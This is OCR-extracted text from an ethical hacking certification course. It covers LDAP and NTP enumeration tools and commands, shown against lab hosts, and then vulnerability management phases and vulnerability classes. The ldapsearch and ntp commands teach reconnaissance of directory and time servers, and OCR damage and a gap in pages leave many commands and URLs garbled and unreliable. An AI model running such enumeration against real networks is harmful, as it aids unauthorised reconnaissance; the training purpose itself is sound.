= LDAP Admin Tool
taf ibepsof.com
LDAP Search
LDAP Account Manager
https://securtyeploded.com
tps: /ww dep-occount-manager.°9 Copyright © by
Al Rights
ty Prohibited
LDAP Enumeration Tools There are many LDAP enumeration tools that access directory listings within Active Directory ‘AD) or other directory services. Using these tools, attackers can enumerate information such as valid usernames, addresses, and departmental details from different LDAP servers. =
Softerra LDAP Administrator
Source: https://www.|dapadministrator.com Softerra LDAP Administrator is an LDAP administration tool that works with LDAP servers such as Active Directory (AD), Novell Directory Services, and Netscape/iPlanet. It browses and manages LDAP directories. As shown in the screenshot, attackers use Softerra LDAP Administrator to enumerate user details such as the username, email address, and department.
Module 04 Page 438
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Enumeration
Exam 312-50 Certified Ethical Hacker
FG Softerra LDAP Administrator
€
¥
©
fii > Production > example.com » OU=London Office >
|
File Edit View Favorites Server Entry Schema Tools Window Help
Qnw¢ BX
%¥
RO,
+ a x [Name ¥ Disabled (4) fn fn fn mn
8- AYRE AF
21
Value
GR
mai
Quick Searc
* Cobjecciass--)
separmment
Maya Bi Sofa Hope Toby Allan Toby Lynch
[email protected] [email protected] [email protected] [email protected]
T ‘Accounting ‘Accounting T
‘Aaron Barton
[email protected]
Tr
¥ Enabled (54)
fi OU-Berin Office
20
2 ie al Ou=New York office i OU=Paris Office ii OU=Toki office 1B Testes
aa on on on ow wn on on or wn on on
Abigal Murphy Alexander Holt ‘Alexander Marsden Alexandra Flynn Aloe Icbal ‘mela Owen Amy Lucas ‘Annie Douglas Anthony Gough Charlie Todd Charlotte Rowe Chelsea Hyde
a.murphy exemle.com [email protected] [email protected] [email protected] aigbal @exemple.com [email protected] [email protected] [email protected] [email protected] tod @exemple.com [email protected] [email protected]
sales 1 ‘Accounting sales 7 HR HR Sales ‘Accounting T Sales Sales
Figure 4.16: Screenshot of Softerra LDAP Administrator
ldapsearch
Source: https://linux.die.net ldapsearch is a shell-accessible interface for the ldap_search_ext (3) library call. ldapsearch opens a connection to an LDAP server, binds it, and performs a search using the specified parameters. The filter should conform to the string representation of the search filters, as defined in RFC 4515. If not provided, the default filter, (objectClass=*), is used. If ldapsearch finds one or more entries, the attributes specified by attrs are returned. If * is listed, all user attributes are returned. If + is listed, all operational attributes are returned. If no attrs are listed, all user attributes are returned. If only 1.1 is listed, no attributes are returned. The search results are displayed using an extended version of the LDAP Data Interchange Format (LDIF). The option -1 controls the output format. Attackers use ldapsearch to enumerate AD users. This allows attackers to establish connections with an LDAP server to perform different searches using specific filters. The following command can be used to perform an LDAP search using simple authentication: ldapsearch
Module 04 Page 439
-h
-x
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Enumeration
Exam 312-50 Certified Ethical Hacker
If the above command is executed successfully, the following command can be executed to obtain additional details related to the naming contexts: ldapsearch
-h
-x
-s
base
namingcontexts
For example, from the output of the above command, if the primary domain component can be identified as Dc=htb , DC=local, the following command can be used to obtain more information about the primary domain: ldapsearch
-h
-x
-b
“DC=htb,DC=local”
The following commands can be used to retrieve information about a specific object or all the objects in a directory tree: ldapsearch
-h
Address>
retrieves
-b
"DC=htb,DC=local"
to the
object
class
"DC=htb,DC=local"
> retrieves information related to all the objects in the directory
The following command retrieves a list of users belonging to a particular object class: ldapsearch -h '(objectClass=
-x -b "DC=htb,DC=local" ' sAMAccountName sAMAccountType x -s base namingce
ap
ee
Edit attacker@par $sud ord for att @parrot lapsearch -h 10.10.1.22
s base namingcontexts|
d LDIF
LDAPv3 base = (default) with scope baseObject (objectcl ng: namingcon
m
=Configuration,DC=CEH, DC=com hema,
C(N=Configuration,DC=C
DomainDnsZone:
# numRespons #
numEntrie
Figure 4.17: Screenshot of ldapsearch Module 04 Page 440
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Enumeration
Exam 312-50 Certified Ethical Hacker
The following are some additional LDAP enumeration tools:
=
AD Explorer (https://docs. microsoft.com)
=
LDAP Admin Tool (https://www./dapsoft.com)
=
LDAP Account Manager (https://www.I|dap-account-manager.org)
=
LDAP Search (https://securityxploded.com)
Module 04 Page 441
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Enumeration
Exam 312-50 Certified Ethical Hacker
LO#05: Use Different Techniques for NTP and NFS Enumeration
NTP and NFS Enumeration Administrators often overlook the Network Time Protocol (NTP) server when considering security. However, if queried properly, it can provide valuable network information to an attacker. Therefore,
it is necessary to know what
information
an attacker can obtain
about
a
network through NTP enumeration. The Network File System (NFS) is used for the management of remote file access. NFS enumeration helps attackers to gather information such as a list of clients connected to the NFS server, along with their IP addresses, and exported directories. This section describes NTP enumeration, the information extracted via NTP enumeration, various NTP enumeration commands, NTP enumeration tools, and NFS enumeration techniques and
tools.
Module 04 Page 442
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Enumeration
CEH
NTP Enumeration Network Time Protocol (NTP) is designed to synchronize the clocks of networked computers It uses UDP port 123 as its primary means of communication
Attackers query the NTP server to gather valuable information, such as @
List of connected hosts
®
Clients IP addresses in a network,
their system names, and OSs
© Internal IPs can also be obtained if the NTP server is in the demilitarized zone (DMZ)
NTP can maintain time to within 10 milliseconds
(1/100 second) over the public Internet
It can achieve accuracies of 200 microseconds or better
in local area networks under ideal conditions
NTP Enumeration NTP is designed to synchronize clocks of networked computers. It uses UDP port 123 as its primary means of communication. NTP can maintain time within an error of 10 ms over the public Internet. Furthermore, it can achieve an accuracy of 200 us or better in LANs under ideal conditions.
The following are some pieces of information an attacker can obtain by querying an NTP server:
=
List of hosts connected to the NTP server
=
Clients IP addresses in the network, their system names, and OSs
=
Internal IPs, if the NTP server is in the demilitarized zone (DMZ)
Module 04 Page 443
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Enumeration
Exam 312-50 Certified Ethical Hacker
@
@
CE H
Commands
NTP Enumeration ntptrace
© Traces a chain of NTP servers back to the primary source
@ ntptrace
ntpde
[-n]
[-m maxhosts]
[-c command]
© Monitors NTP daemon
[servername/IP_address]
[host]
(ntpd) operations and
determines performance
~
© Monitors operation of the NTP daemon, ntpd @ ntpde [-ilnps]
@ ntpq
pq [-inp] amp] © ntteeg
[...]
[-c command] 1 (hese) [hos Thesentpg queriescan be ‘usedt obtain addtional NTP serverinformation
‘These ntpdc queries can be used ‘0 obtain additional NTP server information
Copyright © by
NTP Enumeration Commands NTP
enumeration
commands
such
as ntpdate,
ntptrace,
ntpdc,
and
ntpq are used
to query
an
NTP server for valuable information. ntpdate This command collects the number of time samples from several time sources. Its syntax is as follows: ntpdate version]
[-46bBdqsuv] [-p
samples]
[-a [-t
key]
[-e
timeout]
authdelay] [
-U
user_name]
[-k
keyfile] server
-4
Force DNS resolution of given host names to the IPv4 namespace
-6
Force DNS resolution of given host names to the IPv6 namespace
-a
key
[-o
[...]
Enable the authentication function/specify the key identifierto be used for authentication
-B
Force the time to always be slewed
-b
Force the time to be stepped
-d
Enable debugging mode
-e
authdelay | Specify the processing delay to perform an authentication function
-k
keyfile
-o
version
:
Module 04 Page 444
Specify the path for the authentication key file as the string is /etc/ntp/keys
“keyfile”; the default
Specify the NTP version for outgoing packets as an integer version, which can be 1 or 2; the default is 4
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Enumeration
-p
Exam 312-50 Certified Ethical Hacker
Specify the number of samples to be acquired from each server, with values
samples
.
.
ranging from 1-8; the default is 4
-q
Query only; do not set the clock
-s
Divert logging output from the standard output (default) to the system syslog facility
-t
timeout
Specify the maximum wait time for a server response; the default is 1s
-u
Use an unprivileged port for outgoing packets
-v
Be verbose; logs ntpdate’s version identification string
Table 4.4: ntpdate parameters and their respective functions erminal h
Terminal
—[attacker@parrot isntpdate
21 Mar 020
07:41:26
(1)
Looking
for
-d
10.10.1.22|
ntpdate[72982]:
host
10.10.1.22
and
ntpdate
[email protected]
service
ntp
Wed
Sep
23
11:46:38
UTC
2
host found : 10.10.1.22 transmit(10.10.1.22)
receive(10.10.1.22)
transmit(10.10.1.22) receive(10.10.1.22)
transmit(10.10.1.22)
receive(10.10.1.22)
transmit(10.10.1.22)
receive(10.10.1.22)
server
stratum refid
10.10.1.22,
5,
precision
port
[86.77.84.80],
reference
originate ‘transmit
time:
timestamp:
timestamp:
-23,
root
123
leap
delay
00,
trust
0.000244,
000
root
dispersion
eSe2e2db.4d87bdcf
Mon,
Mar
21
2022
e5e2e2ec.al4a0bbd
Mon,
Mar
21
2022
eS5e2e2ec.al7fb4ec
Mon,
Mar 21 2022
filter
delay:
0©.02805
0.02753
0.02626
0.02803
filter
offset:
-0.000347
-0.001205
-0.000676
-0.000396
dispersion
0.00035,
delay 21
Mar
0.02626, 07:41:32
ntpdate[72982]:
attacker@parrot $
offset
adjust
time
0.010193
7:41:15.302
-0.000676 server
10.10.1.22
offset
-0.000676
sec
Figure 4.18: Screenshot of the ntpdate command, showing debugging information for a given IP
Module 04 Page 445
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Enumeration
Exam 312-50 Certified Ethical Hacker
ntptrace This command determines where the NTP server obtains the time from and follows the chain of NTP servers back to its primary time source. Attackers use this command to trace the list of NTP servers connected to the network. Its syntax is as follows: ntptrace
[-n]
[-m
maxhosts]
[servername/IP_address]
Do not print host names and show only IP addresses; may be useful if a name server
-n
is down
-m maxhosts | Set the maximum
number of levels up the chain to be followed
Table 4.5: ntptrace parameters and their respective functions
Example: #
ntptrace
localhost:
stratum
4,
offset
0.0019529,
10.10.0.1:
stratum
2,
offset
0.01142
73,
synch
10.10.1.1:
distance
synch
distance
0.143235
synch
distance
0.011193
0.115554
stratum
1,
offset
0.0017698,
ntpdc This command queries the ntpd daemon regarding its current state and requests changes in that state. Attackers use this command to retrieve the state and statistics of each NTP server connected to the target network. Its syntax is as follows: ntpde
[
-46dilnps
]
[
-c
command]
[hostname/IP_address]
-4
Force DNS resolution of the given host name to the IPv4 namespace
-6
Force DNS resolution of the given host name to the IPv6 namespace
-d
Set the debugging mode to on
-c
Following argument is interpreted as an interactive format command; multiple -c options may be given
Search the Site
Home
About
CWE List
Search the CWE
Web
Scoring
Mapping Guidance
Community,
Site Search
To search the CWE Web site, enter a keyword by typing in a specific term or multiple keywords separated by a space, and click the Google ‘Search button or press return. SMB
x
About 55 results (0.15 seconds)
CWE-284: Improper Access Control (4.6) - CWE owe mitre org » CWE List
‘Common Weakness Enumeration (CWE) is a list of software weaknesses.
‘CWE-200:
Exposure of Sensitive Information to an ... - CWE
‘CWE-295:
Improper Certificate Validation (4.6) - CWE
‘cwe mitre.org » CWE List ‘Common Weakness Enumeration (CWE) is a list of software weaknesses.
‘ewe mitre.org » CWE List The software does not validate, or incorrectly validates, a certificate. + Extended Description. When a certificate is invalid or malicious, it might allow
CWE-427: Uncontrolled Search Path Element (4.6) - CWE ‘ewe mitre org > CWE List {the directory from which the program has been loaded; the current working directory. In some cases, the attack can be conducted remotely, such as when SMB or ‘CWE-582:
Files or Directories Accessible to External Parties (4.6)
‘owe mitre.org » CWE List This table shows the weaknesses and high level categories that are related to this weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and
CWE-313: Cleartext Storage in a File or on Disk (4.6) - CWE ‘ewe mitre.org > CWE List ‘Common Weakness Enumeration (CWE) is a ist of software weaknesses Figure 5.5: Screenshot showing CWE results for SMB query
Module 05 Page 532
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis
Exam 312-50 Certified Ethical Hacker
ay: : Vulnerability-Management Life Cycle
ee
Pre-AssessmentPhase Identify Assets and
Create a Baseline
Post Assessment Phase
ae E>
7
—_)
ig || EH
Vulnerability Scan
§«—Risk Assessment
¥ Remediation
4 Verification
Monitoring
Copyright © by
Vulnerability-Management Life Cycle The vulnerability management life cycle is an remediate security weaknesses before they can posture and policies for an organization, creating assessing the environment for vulnerabilities and
important process that helps identify be exploited. This includes defining the a complete asset list of systems, scanning exposures, and taking action to mitigate
vulnerabilities that are identified. The implementation
of a vulnerability management
and risk and the
lifecycle
helps gain a strategic perspective regarding possible cybersecurity threats and renders insecure computing environments more resilient to attacks.
Vulnerability management should be implemented in every organization as it evaluates and controls the risks and vulnerabilities in the system. The management process continuously examines the IT environments for vulnerabilities and risks associated with the system. Organizations should maintain a proper vulnerability management information security. Vulnerability management provides the implemented in a sequence of well-organized phases.
Module 05 Page 533
program to ensure overall best results when it is
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis
Exam 312-50 Certified Ethical Hacker
The phases involved in vulnerability management are:
=
Pre-Assessment Phase o
=
Vulnerability Assessment Phase o
=
Identify Assets and Create a Baseline
Vulnerability Scan
Post Assessment Phase o
Risk Assessment
o
Remediation
o.
Verification
o
Monitoring
Module 05 Page 534
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis
Exam 312-50 Certified Ethical Hacker
Pre-Assessment
Phase
C iE H
Identify
Assets and Createa Baseline
©00000000
Identify and understand business processes Identify the applications, data, and services that support the business processes and perform code reviews
Identify approved software, drivers, and the basic configuration of each system Create an inventory of all assets, and prioritize/rank critical assets Understand the network architecture and map the network infrastructure
Identify the controls already in place Understand policy implementation and standards compliance Define the scope of the assessment Create information protection procedures to support effective planning, scheduling, coordination, and logistics
Pre-Assessment Phase Identify Assets and Create a Baseline The pre-assessment phase is a preparatory phase, which involves defining policies and standards, clarifying the scope of the assessment, designing appropriate information protection procedures, and identifying and prioritizing critical assets to create a good baseline for vulnerability management and to define the risk based on the criticality and value of each system. This phase involves the gathering of information about the identified systems to understand the approved ports, software, drivers, and basic configuration of each system in order to develop and maintain a system baseline. The following are the steps involved in creating a baseline: Identify and understand business processes
2.
Identify the applications, data, and services that support the business processes and perform code reviews
NOWBF Ww
1.
Identify the approved software, drivers, and basic configuration of each system Create an inventory of all assets, and prioritize or rank the critical assets
Understand the network architecture and map the network infrastructure Identify the controls already in place Understand
processes 8.
policy
implementation
and
practice
standard
compliance
with
business
Define the scope of the assessment
Module 05 Page 535
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis 9.
Create information protection coordination, and logistics
Exam 312-50 Certified Ethical Hacker procedures
to support
effective
planning,
scheduling,
Classify the identified assets according to the business needs. Classification helps to identify the high business risks in an organization. Prioritize the rated assets based on the impact of their failure and their reliability in the business. Prioritization helps: =
Evaluate and decide a solution for the consequence of the assets failing
=
Examine the risk tolerance level
=
Organize methods for prioritizing the assets
Module 05 Page 536
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis
Exam 312-50 Certified Ethical Hacker
©900O20060000
Vulnerability Assessment Phase
CE H
Examine and evaluate the physical security
4)
Check for misconfigurations and human errors
Q
Run vulnerability scans Select type of scan based on the organization or compliance requirements Identify and prioritize vulnerabilities
Identify false positives and false negatives Apply business and technology contextto scanner results Perform OSINT information gathering to validate the vulnerabilities
Createa vulnerability scan report
Vulnerability Assessment Phase This phase is very crucial in vulnerability management. The vulnerability assessment phase refers to identifying vulnerabilities in the organization’s infrastructure, including the operating system, web applications, and web server. It helps identify the category and criticality of the vulnerability in an organization and minimizes the level of risk. The ultimate goal of vulnerability scanning is to scan, examine, evaluate, and report the vulnerabilities in the organization’s information system. Vulnerability scans can also be performed on applicable compliance templates to assess the organization’s Infrastructure weaknesses against the respective compliance guidelines. The assessment phase involves examining the architecture of the network, evaluating threats to the environment, performing penetration testing, examining and evaluating physical security, analyzing physical assets, assessing operational security, observing policies and procedures, and assessing the infrastructure’s interdependencies. Steps involved in the assessment phase: 1.
Examine and evaluate the physical security
2.
Check for misconfigurations and human errors
3.
Run vulnerability scans using tools
4.
Select the type of scan based on the organization or compliance requirements
5.
Identify and prioritize vulnerabilities
6.
Identify false positives and false negatives
7.
Apply the business and technology context to scanner results
Module 05 Page 537
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis
Exam 312-50 Certified Ethical Hacker
8.
Perform OSINT information gathering to validate the vulnerabilities
9.
Create a vulnerability scan report
Module 05 Page 538
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Vulnerability Analysis
Exam 312-50 Certified Ethical Hacker
Post Assessment Phase Risk Assessment
CE H }
1
© Perform risk categorization
Remediation
© Prioritize remediation based on the risk ranking
© Develop an action plan to implement the recommendation/remediation © Perform root cause analysis © Apply patches/fixes Capture lessons learned
© Assess the level of impact © Determine the threat and risk levels
Conduct awareness training
Monitoring
f
1
© Periodic vulnerability scan and assessment
Verification
v
© Rescan of systemsto identify if applied fix has
remediated the vulnerability © Perform dynamic analysis © Review of attack surface
© Timely remediation of identified vulnerabilities © Intrusion detection and intrusion prevention logs © Implementation of policies, procedures, and
controls
e
=y
Peete
BD
Post Assessment Phase The post-assessment phase, also known as the recommendation phase, is performed after and based on risk assessment. Risk characterization is categorized by key criteria, which helps prioritize the list of recommendations. The tasks performed in the post-assessment phase include: =
Creating a priority list for assessment recommendations based on the impact analysis
=
Developing an action plan to implement the proposed remediation
=
Capturing lessons learned to improve the complete process in the future
=
Conducting training for employees
Post assessment includes risk assessment, remediation, verification, and monitoring.
=
Risk Assessment In the risk assessment phase, risks are identified, characterized, and classified along with the techniques used to control or reduce their impact. It is an important step toward identifying the security weaknesses in the IT architecture of an organization.
In this phase, all serious uncertainties that are and prioritized, and remediation is planned to risk assessment summarizes the vulnerability selected assets. It determines whether the moderate,
or low.
Remediation
is planned
associated with the system are assessed permanently eliminate system flaws. The and risk level identified for each of the risk level for a particular asset is high, based
on
the
determined
risk
level.
For
example, vulnerabilities ranked high-risk are targeted first to decrease the chances of exploitation that would adversely impact the organization. Module 05 Page 539
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis
Exam 312-50 Certified Ethical Hacker
The tasks performed in the risk assessment phase include:
=
o
Perform risk categorization based on risk ranking (for example, critical, high, medium, and low)
o.
Assess the level of impact
o
Determine the threat and risk levels
Remediation Remediation is the process of applying fixes on vulnerable systems in order to mitigate or reduce the impact and severity of vulnerabilities. These include steps like evaluating vulnerabilities, locating risks, and designing responses for vulnerabilities. It is important for the remediation process to be specific, measurable, attainable, relevant, and timebound. This
phase
is initiated
assessment steps.
after
the
successful
implementation
of
the
baseline
and
The tasks performed in the remediation phase include:
=
o
Prioritize remediation based on the risk ranking
o
Develop an action plan to implement the recommendation or remediation
o
Perform a root-cause analysis
o
Apply patches and fixes
o
Capture lessons learned
o
Conduct awareness training
o
Perform exception be remediated
handling and risk acceptance for the vulnerabilities that cannot
Verification In this phase, the security team performs a re-scan of systems to assess if the required remediation is complete and whether the individual fixes have been applied to the impacted assets. This phase includes the verification of the remedies used to mitigate risks. It provides clear visibility into the firm and allows the security team to check whether all the previous phases have been perfectly employed or not. Verification can be performed by using various means such as ticketing systems, scanners, and reports. The tasks performed in the verification phase include: o
Rescanning the systems to identify if an applied fix is effective in remediating the vulnerability
o
Performing dynamic analysis
o
Reviewing the attack surface
Module 05 Page 540
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis =
Exam 312-50 Certified Ethical Hacker
Monitoring Organizations need to perform regular monitoring to maintain system security. Continuous monitoring identifies potential threats and any new vulnerabilities that have evolved. As per security best practices, all phases of vulnerability management must be performed regularly.
This phase performs incident monitoring using tools such as IDS/IPS, SIEM, and firewalls. It implements continuous security monitoring to thwart ever-evolving threats. The tasks performed in the monitoring phase include: o
Periodic vulnerability scan and assessment
o
Timely remediation of identified vulnerabilities
o
Monitoring intrusion detection and intrusion prevention logs
o
Implementing policies, procedures, and controls
Module 05 Page 541
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis
Exam 312-50 Certified Ethical Hacker
C'EH
LO#02: Explain Vulnerability Classification and Assessment Types
Copyright © by’
Al Rights Reser
Vulnerability Classification and Assessment Types Any vulnerability that is present in a system the organization. It is important for ethical vulnerabilities that they can employ, along This section in the module discusses the
assessments.
Module 05 Page 542
can be hazardous and can cause severe damage to hackers to have knowledge about various types of with various vulnerability assessment techniques. various types of vulnerabilities and vulnerability
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis
Exam 312-50 Certified Ethical Hacker
Vulnerability Classification
CE H
= © Misconfiguration is the mostcommon vulnerability and is mainly caused by human error
Network Misconfigurations nee een persandserecstorers pees ei steko
©
Host Misconfigurations
Misconfigurations/Weak Configurations
Comets
Itallows attackers to break into a network and gain unauthorized
‘access to systems
© Application flaws are vulnerabilities in applications that are exploited by attackers © Flawed applications pose security threats such asdatatamperingand unauthorized access to configuration stores
Poor Patch Management Design Flaws Third-Party Risks
© Software vendors provide patches that prevent exploitations and reduce the probability of threats exploiting a specific vulnerability fal Unreahesleor warettanirelisenieepicstioniverten on tetice vulnerable to various attacks © Logical flaws in the functionality of the system are exploited by the attackers to bypass the detection mechanismand acquire access toa_ secure system
* [potcstons twoughwhch nancelnfomaton,cstomer and PP bu 4
‘employee data, and processes in the enterprise's supply chain can be compromised
© Open permissions and unsecured root accounts Buffer overflows, memory leaks, resource exhaustion, integer overflows, null pointer/object dereference,
__DLLinjection, race conditions, improper input handling, and improper error handling
© Unpatched servers, unpatched firmware, unpatched 3 0S, and unpatched applications © Incorrect encryption and poor validation of data
© Yendotmaragement hanandriskscloud-based outsourcedvs. code development, datasuply storage, on-premises risks p
cerved. Reproduction is Strictly Prohibited
Vulnerability Classification (Cont’d) Default installations/Defautt Configurations ions Operating System Flaws
Default Passwords 2ero-Day Vulnerable coacy
Platform Vulnerabilities
Sonera Improper Certificate and Key Management
CEH
© Failing to change the default settings while deploying softwareor hardware allowsthe attackerto guess the settingsto break into the system © Owing to 0S vulnerabilities, applications such as Trojans, worms, and viruses pose threats ‘Manufacturers provide users with default passwords to access the device during its intial set-up, which users ‘must change for future use
© When users forgetto update the passwordsand continue using the default passwords, they make devices and systems vinerable to various attacks, such as brute-forceand dictionary attacks © These are unknown vulnerabilities in software/hardware that are exposed but notyet patched © These vuinerabilties are exploited by the attackers before being acknowledged and patched by the software developers or security analysts © Legacy platform vulnerabilities are caused by obsolete or familar code © Legacy platforms are usually not supported when patching technical assets such as smartphones, computers, loT devices, OSes, applications, databases, firewalls, IDSes, or other network components This type of vulnerabilities can cause costly data breaches for organizations The system spraw vulnerability arises within an organizational network because ofan increased number of system or server connections without proper documentation or an understanding of ther maintenance © These assets are often neglected over time, making them susceptible to attacks
© Improper certificate and key management may lead to many vulnerabilities that allow attackers to perform password cracking and data exfiltration attacks © Storing or retaining legacy or outdated keys also poses major threats to organizations cerved. Reproduction is Strictly Prohibited
Vulnerability Classification Vulnerabilities present in a system or network are classified into the following categories: Misconfigurations/Weak Configurations
Misconfiguration is the most common vulnerability and is mainly caused by human error. It allows attackers to break into a network and gain unauthorized access to systems. Misconfigurations may occur both intentionally and unintentionally, and they affect web Module 05 Page 543
al Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis
Exam 312-50 Certified Ethical Hacker
servers, application platforms, databases, and networks. Attackers can detect misconfigurations through various scanning techniques and then exploit backend systems. Therefore, administrators must change the default configuration of devices and optimize device security. Network Misconfigurations Frequent changes to network and security devices are inevitable and essential for business improvement. However, administrators should ensure that all network components are configured appropriately because any loops in the implemented changes can cause adverse effects on the network such as performance degradation, service outage, and network intrusions. The following are some examples of weak network configurations. °
Insecure Protocols Insecure protocols transmit information or data in plaintext without implementing any encryption techniques to secure the data. The use of vulnerable protocols causes authentication and integrity issues because attackers can leverage the unencrypted files or data transmission and tamper with the data in transit. Attackers can also gain remote access to the vulnerable system once they capture the credentials being shared in plaintext. This vulnerability can be avoided by removing devices operating on insecure protocols and deploying a centralized master node to update protocols. Open Ports and Services
User communications with an application or service can be achieved through TCP or UDP port numbers, which accept and transmit the information in the form of packets. The source and destination addresses can be identified through the unique IP addresses assigned to them. In addition to these, many ports operate in a network for specific services. Servers often operate with some open ports, but all open ports are not dangerous, unless they are misconfigured, unpatched, or implemented with poor security rules. However, the open ports must be limited and used only for important services. Leaving ports open for unnecessary services can invite new threats to the network. Open ports and services may lead to the loss of data or Denial-of-Service (DoS) attacks and allow attackers to perform further attacks on other connected devices. Administrators must continuously check for unnecessary or insecure ports and services to reduce the risk to the network. Errors
Improper configuration of applications or services can generate error reports while loading pages. Such error reports can provide detailed information to attackers searching for security flaws, application vulnerabilities, programming faults, or other exploits. Using outdated software can also generate security errors, which can be susceptible to remote attacks using techniques such as code injection to manipulate the application. To prevent this vulnerability, skilled programming practices need to
Module 05 Page 544
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis
Exam 312-50 Certified Ethical Hacker
be adopted in such a manner that the application does not information that could help attackers exploit the application server. o
disclose
critical
Weak Encryption Implementing proper encryption methods can secure the data being transmitted across a network and the data saved on storage devices. The encrypted files can be accessed only with the corresponding decrypted key held by the client or application. Weak encryption can allow attackers to perform man-in-the-middle attacks, sniff the traffic to modify data, and then masquerade as the legitimate service to communicate with the end users with false information. The following are some causes of weak encryption:
=
e
Using a weak encryption algorithm
e
Key generation with guessable credentials
e
Insecure key distribution
Host Misconfigurations Attackers can exploit configuration flaws in the host server to manipulate the resources and gain remote administrator access. The debugging functions could be activated, and unknown users may gain administrative permissions. These vulnerabilities may allow attackers to evade authentication mechanisms and access critical information, possibly with elevated privileges. The following are some examples of weak host configuration. o
Open Permissions
Granting unnecessary permissions to a user or group of users to access applications or files can lead to security issues such as data leakage or corruption of system functionality. Managing permissions is a complicated task, where administrators or users can potentially make mistakes such as allowing unknown guests to read and write critical files. An attacker can also perform privilege escalation by using unnecessarily created accounts to access unprotected files or to run commands on the operating system (OS). o
Unsecured
Root Accounts
Using manufacturer-allotted default administrative account credentials for the database or applications can lead to system security issues. Failing to implement a secure password privacy policy can allow attackers to guess the credentials using different brute-force techniques. Application Flaws Application flaws are vulnerabilities in applications that are exploited by attackers. Applications should be secured using the validation and authorization of the user. Flawed applications pose security threats such as data tampering and unauthorized access to configuration stores. If applications are not secured, sensitive information may be lost or corrupted. Hence, developers
Module 05 Page 545
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis
Exam 312-50 Certified Ethical Hacker
must understand the anatomy of common security vulnerabilities and develop highly secure applications by providing proper user validation and authorization. The following are some of the application flaws that can be exploited by attackers. Buffer Overflows Buffer overflows are common software vulnerabilities resulting from coding errors that allow attackers to gain access to the target system. In a buffer overflow attack, the attacker undermines the functioning of programs and attempts to take control of the system by writing content beyond the allocated size of the buffer. Insufficient bounds checking in the program is the root cause of this vulnerability. The buffer cannot handle data beyond its limit, causing the flow of data to adjacent memory locations and overwriting their data values. When a buffer overflow occurs, systems often crash, become unstable, or show erratic program behavior. Memory Leaks A memory leak or resource leak is an unintended class of memory consumption that occurs when a programmer fails to erase an assigned block of memory when no longer required. It is caused by exceptional circumstances, flaw conditions, and uncertainty over which portion of code is responsible for freeing memory. These conditions depend on application consequences in cases such as such as short-lived user-land applications, long-lived user-land applications, and kernel-land processes. A memory leak results in software reliability-related concerns and encourages a malicious actor to take control over the compromised system to perform attacks such as DoS to crash the system, inject malicious code to change application behavior, and hijack the program’s control flow. Tools such as Valgrind, which is compatible with the Unix/Linux environment, track memory leaks and display the status of the software environment. Resource Exhaustion A resource exhaustion attack damages the server by sending multiple resource requests from different locations to exploit software bugs or errors, thereby hanging the system
and server or causing a system crash. In software applications, memory management
has an error of memory leaks that can be exploited easily by remote attackers. It is similar to a DoS attack in that it can compromise or exhaust the resources available for a system in the network. Owing to design or code errors, any interaction or connection established between the client and server can waste resources or consume more resources than required. Integer Overflows An integer overflow occurs when an arithmetic function generates and attempts to store an integer value larger than the maximum value that the allocated memory space can store. These overflow conditions may lead to undesirable behavior of the software. Failure to discover an overflow condition beforehand can cause security and reliability issues in the program. Alongside yielding inaccurate results and causing software instability, integer overflows can also lead to buffer overflows and open doors for Module 05 Page 546
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis attackers to execution.
=
manipulate
Exam 312-50 Certified Ethical Hacker values,
eventually
leading
to
random
or
malicious
code
